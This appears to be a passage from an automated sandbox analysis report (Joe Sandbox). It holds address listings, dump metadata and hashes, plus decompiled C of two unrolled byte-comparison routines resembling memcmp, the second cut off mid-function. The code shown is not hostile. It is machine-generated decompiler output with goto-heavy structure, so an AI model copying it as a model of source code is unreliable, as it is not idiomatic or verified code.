                    0x00437b3f
                    0x00437b47
                    0x00437b49
                    0x00437b52
                    0x00437b52
                    0x00000000
                    0x00437b49
                    0x00437b30
                    0x00437b39
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437b39
                    0x00437b0e
                    0x00437b17
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437b17
                    0x00437aec
                    0x00437af5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437af5
                    0x00437a4a
                    0x00437a4c
                    0x00437a64
                    0x00437a6c
                    0x00437a6e
                    0x00437a86
                    0x00437a8e
                    0x00437a90
                    0x00437aa8
                    0x00437ab0
                    0x00437ab2
                    0x00437abb
                    0x00437abb
                    0x00000000
                    0x00437ab2
                    0x00437a99
                    0x00437aa2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437aa2
                    0x00437a77
                    0x00437a80
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437a80
                    0x00437a55
                    0x00437a5e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437a5e
                    0x004379b2
                    0x004379b4
                    0x004379cc
                    0x004379d4
                    0x004379d6
                    0x004379ee
                    0x004379f6
                    0x004379f8
                    0x00437a10
                    0x00437a18
                    0x00437a1a
                    0x00437a23
                    0x00437a23
                    0x00000000
                    0x00437a1a
                    0x00437a01
                    0x00437a0a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437a0a
                    0x004379df
                    0x004379e8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004379e8
                    0x004379bd
                    0x004379c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004379c6
                    0x0043791b
                    0x0043791d
                    0x00437935
                    0x0043793d
                    0x0043793f
                    0x00437957
                    0x0043795f
                    0x00437961
                    0x00437979
                    0x00437981
                    0x00437983
                    0x0043798c
                    0x0043798c
                    0x00000000
                    0x00437983
                    0x0043796a
                    0x00437973
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437973
                    0x00437948
                    0x00437951
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437951
                    0x00437926
                    0x0043792f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043792f
                    0x00437884
                    0x00437886
                    0x0043789e
                    0x004378a6
                    0x004378a8
                    0x004378c0
                    0x004378c8
                    0x004378ca
                    0x004378e2
                    0x004378ea
                    0x004378ec
                    0x004378f5
                    0x004378f5
                    0x00000000
                    0x004378ec
                    0x004378d3
                    0x004378dc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004378dc
                    0x004378b1
                    0x004378ba
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004378ba
                    0x0043788f
                    0x00437898
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437898
                    0x004377ed
                    0x004377ef
                    0x00437807
                    0x0043780f
                    0x00437811
                    0x00437829
                    0x00437831
                    0x00437833
                    0x0043784b
                    0x00437853
                    0x00437855
                    0x0043785e
                    0x0043785e
                    0x00000000
                    0x00437855
                    0x0043783c
                    0x00437845
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437845
                    0x0043781a
                    0x00437823
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437823
                    0x004377f8
                    0x00437801
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043774f
                    0x0043774f
                    0x00437756
                    0x00437758
                    0x00437770
                    0x00437770
                    0x00437778
                    0x0043777a
                    0x00437792
                    0x00437792
                    0x0043779a
                    0x0043779c
                    0x004377b4
                    0x004377b4
                    0x004377bc
                    0x004377be
                    0x004377c7
                    0x004377c7
                    0x00000000
                    0x004377be
                    0x004377a2
                    0x004377a5
                    0x004377ae
                    0x00437306
                    0x00437306
                    0x004380f7
                    0x004380f7
                    0x00000000
                    0x004377ae
                    0x00437780
                    0x00437783
                    0x0043778c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043778c
                    0x0043775e
                    0x00437761
                    0x0043776a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043776a

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: a250165298dc056239f6a3dd3e61f31ddd398e9be3f963aed1090fd646a00d99
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: E9C1A0B220D0934ADB3E4639853453FBAA15E967B171A275FD8F3CB2C4FF288524D624
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00437B78(void* __edx, void* __esi) {
                    				signed int _t197;
                    				signed char _t198;
                    				signed char _t199;
                    				signed char _t200;
                    				signed char _t202;
                    				signed char _t203;
                    				signed int _t246;
                    				void* _t294;
                    				void* _t297;
                    				void* _t299;
                    				void* _t301;
                    				void* _t303;
                    				void* _t305;
                    				void* _t307;
                    				void* _t309;
                    				void* _t311;
                    				void* _t313;
                    				void* _t315;
                    				void* _t317;
                    				void* _t319;
                    				void* _t321;
                    				void* _t323;
                    				void* _t325;
                    				void* _t327;
                    				void* _t329;
                    				void* _t331;
                    				void* _t333;
                    				void* _t335;
                    				void* _t336;
                    
                    				_t336 = __esi;
                    				_t294 = __edx;
                    				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                    					_t246 = 0;
                    					L14:
                    					if(_t246 != 0) {
                    						goto L1;
                    					}
                    					_t198 =  *(_t336 - 0x1b);
                    					if(_t198 ==  *(_t294 - 0x1b)) {
                    						_t246 = 0;
                    						L25:
                    						if(_t246 != 0) {
                    							goto L1;
                    						}
                    						_t199 =  *(_t336 - 0x17);
                    						if(_t199 ==  *(_t294 - 0x17)) {
                    							_t246 = 0;
                    							L36:
                    							if(_t246 != 0) {
                    								goto L1;
                    							}
                    							_t200 =  *(_t336 - 0x13);
                    							if(_t200 ==  *(_t294 - 0x13)) {
                    								_t246 = 0;
                    								L47:
                    								if(_t246 != 0) {
                    									goto L1;
                    								}
                    								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                    									_t246 = 0;
                    									L58:
                    									if(_t246 != 0) {
                    										goto L1;
                    									}
                    									_t202 =  *(_t336 - 0xb);
                    									if(_t202 ==  *(_t294 - 0xb)) {
                    										_t246 = 0;
                    										L69:
                    										if(_t246 != 0) {
                    											goto L1;
                    										}
                    										_t203 =  *(_t336 - 7);
                    										if(_t203 ==  *(_t294 - 7)) {
                    											_t246 = 0;
                    											L80:
                    											if(_t246 != 0) {
                    												goto L1;
                    											}
                    											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                    											if(_t297 == 0) {
                    												L83:
                    												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                    												if(_t299 == 0) {
                    													L3:
                    													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                    													if(_t246 != 0) {
                    														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    													}
                    													goto L1;
                    												}
                    												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                    												if(_t246 != 0) {
                    													goto L1;
                    												} else {
                    													goto L3;
                    												}
                    											}
                    											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                    											if(_t246 != 0) {
                    												goto L1;
                    											}
                    											goto L83;
                    										}
                    										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                    										if(_t301 == 0) {
                    											L73:
                    											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                    											if(_t303 == 0) {
                    												L75:
                    												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                    												if(_t305 == 0) {
                    													L77:
                    													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                    													if(_t246 != 0) {
                    														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    													}
                    													goto L80;
                    												}
                    												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                    												if(_t246 != 0) {
                    													goto L1;
                    												}
                    												goto L77;
                    											}
                    											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                    											if(_t246 != 0) {
                    												goto L1;
                    											}
                    											goto L75;
                    										}
                    										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                    										if(_t246 != 0) {
                    											goto L1;
                    										}
                    										goto L73;
                    									}
                    									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                    									if(_t307 == 0) {
                    										L62:
                    										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                    										if(_t309 == 0) {
                    											L64:
                    											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                    											if(_t311 == 0) {
                    												L66:
                    												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                    												if(_t246 != 0) {
                    													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    												}
                    												goto L69;
                    											}
                    											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                    											if(_t246 != 0) {
                    												goto L1;
                    											}
                    											goto L66;
                    										}
                    										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                    										if(_t246 != 0) {
                    											goto L1;
                    										}
                    										goto L64;
                    									}
                    									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                    									if(_t246 != 0) {
                    										goto L1;
                    									}
                    									goto L62;
                    								}
                    								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                    								if(_t313 == 0) {
                    									L51:
                    									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                    									if(_t315 == 0) {
                    										L53:
                    										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                    										if(_t317 == 0) {
                    											L55:
                    											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                    											if(_t246 != 0) {
                    												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    											}
                    											goto L58;
                    										}
                    										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                    										if(_t246 != 0) {
                    											goto L1;
                    										}
                    										goto L55;
                    									}
                    									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                    									if(_t246 != 0) {
                    										goto L1;
                    									}
                    									goto L53;
                    								}
                    								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                    								if(_t246 != 0) {
                    									goto L1;
                    								}
                    								goto L51;
                    							}
                    							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                    							if(_t319 == 0) {
                    								L40:
                    								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                    								if(_t321 == 0) {
                    									L42:
                    									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                    									if(_t323 == 0) {
                    										L44:
                    										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                    										if(_t246 != 0) {
                    											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    										}
                    										goto L47;
                    									}
                    									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                    									if(_t246 != 0) {
                    										goto L1;
                    									}
                    									goto L44;
                    								}
                    								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                    								if(_t246 != 0) {
                    									goto L1;
                    								}
                    								goto L42;
                    							}
                    							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                    							if(_t246 != 0) {
                    								goto L1;
                    							}
                    							goto L40;
                    						}
                    						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                    						if(_t325 == 0) {
                    							L29:
                    							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                    							if(_t327 == 0) {
                    								L31:
                    								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                    								if(_t329 == 0) {
                    									L33:
                    									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                    									if(_t246 != 0) {
                    										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    									}
                    									goto L36;
                    								}
                    								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                    								if(_t246 != 0) {
                    									goto L1;
                    								}
                    								goto L33;
                    							}
                    							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                    							if(_t246 != 0) {
                    								goto L1;
                    							}
                    							goto L31;
                    						}
                    						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                    						if(_t246 != 0) {
                    							goto L1;
                    						}
                    						goto L29;
                    					}
                    					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                    					if(_t331 == 0) {
                    						L18:
                    						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                    						if(_t333 == 0) {
                    							L20:
                    							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                    							if(_t335 == 0) {
                    								L22:
                    								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                    								if(_t246 != 0) {
                    									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                    								}
                    								goto L25;
                    							}
                    							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                    							if(_t246 != 0) {
                    								goto L1;
                    							}
                    							goto L22;
                    						}
                    						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                    						if(_t246 != 0) {
                    							goto L1;
                    						}
                    						goto L20;
                    					}
                    					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                    					if(_t246 != 0) {
                    						goto L1;
                    					}
                    					goto L18;
                    				} else {
                    					__edi =  *(__esi - 0x1f) & 0x000000ff;
                    					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                    					if(__edi == 0) {
                    						L7:
                    						__edi =  *(__esi - 0x1e) & 0x000000ff;
                    						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                    						if(__edi == 0) {
                    							L9:
                    							__edi =  *(__esi - 0x1d) & 0x000000ff;
                    							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                    							if(__edi == 0) {
                    								L11:
                    								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                    								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                    								if(__ecx != 0) {
                    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                    								}
                    								goto L14;
                    							}
                    							0 = 0 | __edi > 0x00000000;
                    							__ecx = (__edi > 0) * 2 != 1;
                    							if((__edi > 0) * 2 != 1) {
                    								goto L1;
                    							}
                    							goto L11;
                    						}
                    						0 = 0 | __edi > 0x00000000;
                    						__ecx = (__edi > 0) * 2 != 1;
                    						if((__edi > 0) * 2 != 1) {
                    							goto L1;
                    						}
                    						goto L9;
                    					}
                    					0 = 0 | __edi > 0x00000000;
                    					__ecx = (__edi > 0) * 2 != 1;
                    					if((__edi > 0) * 2 != 1) {
                    						goto L1;
                    					}
                    					goto L7;
                    				}
                    				L1:
                    				_t197 = _t246;
                    				return _t197;
                    			}
































                    0x00437b78
                    0x00437b78
                    0x00437b7e
                    0x00437c06
                    0x00437c08
                    0x00437c0a
                    0x00000000
                    0x00000000
                    0x00437c10
                    0x00437c16
                    0x00437c9d
                    0x00437c9f
                    0x00437ca1
                    0x00000000
                    0x00000000
                    0x00437ca7
                    0x00437cad
                    0x00437d34
                    0x00437d36
                    0x00437d38
                    0x00000000
                    0x00000000
                    0x00437d3e
                    0x00437d44
                    0x00437dcb
                    0x00437dcd
                    0x00437dcf
                    0x00000000
                    0x00000000
                    0x00437ddb
                    0x00437e63
                    0x00437e65
                    0x00437e67
                    0x00000000
                    0x00000000
                    0x00437e6d
                    0x00437e73
                    0x00437efa
                    0x00437efc
                    0x00437efe
                    0x00000000
                    0x00000000
                    0x00437f04
                    0x00437f0a
                    0x00437f91
                    0x00437f93
                    0x00437f95
                    0x00000000
                    0x00000000
                    0x00437fa3
                    0x00437fa5
                    0x00437fbd
                    0x00437fc5
                    0x00437fc7
                    0x00437720
                    0x00437728
                    0x0043772a
                    0x00437737
                    0x00437737
                    0x00000000
                    0x0043772a
                    0x00437fd4
                    0x0043771a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043771a
                    0x00437fae
                    0x00437fb7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437fb7
                    0x00437f17
                    0x00437f19
                    0x00437f31
                    0x00437f39
                    0x00437f3b
                    0x00437f53
                    0x00437f5b
                    0x00437f5d
                    0x00437f75
                    0x00437f7d
                    0x00437f7f
                    0x00437f88
                    0x00437f88
                    0x00000000
                    0x00437f7f
                    0x00437f66
                    0x00437f6f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437f6f
                    0x00437f44
                    0x00437f4d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437f4d
                    0x00437f22
                    0x00437f2b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437f2b
                    0x00437e80
                    0x00437e82
                    0x00437e9a
                    0x00437ea2
                    0x00437ea4
                    0x00437ebc
                    0x00437ec4
                    0x00437ec6
                    0x00437ede
                    0x00437ee6
                    0x00437ee8
                    0x00437ef1
                    0x00437ef1
                    0x00000000
                    0x00437ee8
                    0x00437ecf
                    0x00437ed8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437ed8
                    0x00437ead
                    0x00437eb6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437eb6
                    0x00437e8b
                    0x00437e94
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437e94
                    0x00437de9
                    0x00437deb
                    0x00437e03
                    0x00437e0b
                    0x00437e0d
                    0x00437e25
                    0x00437e2d
                    0x00437e2f
                    0x00437e47
                    0x00437e4f
                    0x00437e51
                    0x00437e5a
                    0x00437e5a
                    0x00000000
                    0x00437e51
                    0x00437e38
                    0x00437e41
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437e41
                    0x00437e16
                    0x00437e1f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437e1f
                    0x00437df4
                    0x00437dfd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437dfd
                    0x00437d51
                    0x00437d53
                    0x00437d6b
                    0x00437d73
                    0x00437d75
                    0x00437d8d
                    0x00437d95
                    0x00437d97
                    0x00437daf
                    0x00437db7
                    0x00437db9
                    0x00437dc2
                    0x00437dc2
                    0x00000000
                    0x00437db9
                    0x00437da0
                    0x00437da9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437da9
                    0x00437d7e
                    0x00437d87
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437d87
                    0x00437d5c
                    0x00437d65
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437d65
                    0x00437cba
                    0x00437cbc
                    0x00437cd4
                    0x00437cdc
                    0x00437cde
                    0x00437cf6
                    0x00437cfe
                    0x00437d00
                    0x00437d18
                    0x00437d20
                    0x00437d22
                    0x00437d2b
                    0x00437d2b
                    0x00000000
                    0x00437d22
                    0x00437d09
                    0x00437d12
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437d12
                    0x00437ce7
                    0x00437cf0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437cf0
                    0x00437cc5
                    0x00437cce
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437cce
                    0x00437c23
                    0x00437c25
                    0x00437c3d
                    0x00437c45
                    0x00437c47
                    0x00437c5f
                    0x00437c67
                    0x00437c69
                    0x00437c81
                    0x00437c89
                    0x00437c8b
                    0x00437c94
                    0x00437c94
                    0x00000000
                    0x00437c8b
                    0x00437c72
                    0x00437c7b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437c7b
                    0x00437c50
                    0x00437c59
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437c59
                    0x00437c2e
                    0x00437c37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437b84
                    0x00437b88
                    0x00437b8c
                    0x00437b8e
                    0x00437ba6
                    0x00437ba6
                    0x00437bae
                    0x00437bb0
                    0x00437bc8
                    0x00437bc8
                    0x00437bd0
                    0x00437bd2
                    0x00437bea
                    0x00437bea
                    0x00437bf2
                    0x00437bf4
                    0x00437bfd
                    0x00437bfd
                    0x00000000
                    0x00437bf4
                    0x00437bd8
                    0x00437bdb
                    0x00437be4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437be4
                    0x00437bb6
                    0x00437bb9
                    0x00437bc2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437bc2
                    0x00437b94
                    0x00437b97
                    0x00437ba0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00437ba0
                    0x00437306
                    0x00437306
                    0x004380f7

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: bb4dc1a2969a4572eb6637a55c7cdb981950f40d0835ed5e297c9772103efa13
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 58C1B4B220D0934ADB3E4639853453FBAA15B967B171A275ED8F3CB2C4FF18C524D524
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0043730E(void* __edx, void* __esi) {
                    				signed int _t184;
                    				signed char _t185;
                    				signed char _t186;
                    				signed char _t187;
                    				signed char _t188;
                    				signed char _t190;
                    				signed int _t231;
                    				void* _t275;
                    				void* _t278;
                    				void* _t280;
                    				void* _t282;
                    				void* _t284;
                    				void* _t286;
                    				void* _t288;
                    				void* _t290;
                    				void* _t292;
                    				void* _t294;
                    				void* _t296;
                    				void* _t298;
                    				void* _t300;
                    				void* _t302;
                    				void* _t304;
                    				void* _t306;
                    				void* _t308;
                    				void* _t310;
                    				void* _t312;
                    				void* _t313;
                    
                    				_t313 = __esi;
                    				_t275 = __edx;
                    				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                    					_t231 = 0;
                    					L11:
                    					if(_t231 != 0) {
                    						goto L1;
                    					}
                    					_t185 =  *(_t313 - 0x19);
                    					if(_t185 ==  *(_t275 - 0x19)) {
                    						_t231 = 0;
                    						L22:
                    						if(_t231 != 0) {
                    							goto L1;
                    						}
                    						_t186 =  *(_t313 - 0x15);
                    						if(_t186 ==  *(_t275 - 0x15)) {
                    							_t231 = 0;
                    							L33:
                    							if(_t231 != 0) {
                    								goto L1;
                    							}
                    							_t187 =  *(_t313 - 0x11);
                    							if(_t187 ==  *(_t275 - 0x11)) {
                    								_t231 = 0;
                    								L44:
                    								if(_t231 != 0) {
                    									goto L1;
                    								}
                    								_t188 =  *(_t313 - 0xd);
                    								if(_t188 ==  *(_t275 - 0xd)) {
                    									_t231 = 0;
                    									L55:
                    									if(_t231 != 0) {
                    										goto L1;
                    									}
                    									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                    										_t231 = 0;
                    										L66:
                    										if(_t231 != 0) {
                    											goto L1;
                    										}
                    										_t190 =  *(_t313 - 5);
                    										if(_t190 ==  *(_t275 - 5)) {
                    											_t231 = 0;
                    											L77:
                    											if(_t231 == 0) {
                    												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                    												if(_t231 != 0) {
                    													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    												}
                    											}
                    											goto L1;
                    										}
                    										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                    										if(_t278 == 0) {
                    											L70:
                    											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                    											if(_t280 == 0) {
                    												L72:
                    												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                    												if(_t282 == 0) {
                    													L74:
                    													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                    													if(_t231 != 0) {
                    														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    													}
                    													goto L77;
                    												}
                    												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                    												if(_t231 != 0) {
                    													goto L1;
                    												}
                    												goto L74;
                    											}
                    											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                    											if(_t231 != 0) {
                    												goto L1;
                    											}
                    											goto L72;
                    										}
                    										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                    										if(_t231 != 0) {
                    											goto L1;
                    										}
                    										goto L70;
                    									}
                    									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                    									if(_t284 == 0) {
                    										L59:
                    										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                    										if(_t286 == 0) {
                    											L61:
                    											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                    											if(_t288 == 0) {
                    												L63:
                    												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                    												if(_t231 != 0) {
                    													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    												}
                    												goto L66;
                    											}
                    											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                    											if(_t231 != 0) {
                    												goto L1;
                    											}
                    											goto L63;
                    										}
                    										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                    										if(_t231 != 0) {
                    											goto L1;
                    										}
                    										goto L61;
                    									}
                    									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                    									if(_t231 != 0) {
                    										goto L1;
                    									}
                    									goto L59;
                    								}
                    								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                    								if(_t290 == 0) {
                    									L48:
                    									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                    									if(_t292 == 0) {
                    										L50:
                    										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                    										if(_t294 == 0) {
                    											L52:
                    											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                    											if(_t231 != 0) {
                    												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    											}
                    											goto L55;
                    										}
                    										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                    										if(_t231 != 0) {
                    											goto L1;
                    										}
                    										goto L52;
                    									}
                    									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                    									if(_t231 != 0) {
                    										goto L1;
                    									}
                    									goto L50;
                    								}
                    								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                    								if(_t231 != 0) {
                    									goto L1;
                    								}
                    								goto L48;
                    							}
                    							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                    							if(_t296 == 0) {
                    								L37:
                    								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                    								if(_t298 == 0) {
                    									L39:
                    									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                    									if(_t300 == 0) {
                    										L41:
                    										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                    										if(_t231 != 0) {
                    											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                    										}
                    										goto L44;
                    									}
                    									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                    									if(_t231 != 0) {
                    										goto L1;
                    									}
                    									goto L41;
                    								}
                    								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                    								if(_t231 != 0) {
                    									goto L1;
                    								}
                    								goto L39;
                    							}
                    							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                    							if(_t231 != 0) {
                    								goto L1;
                    							}
                    							goto L37;
                    						}
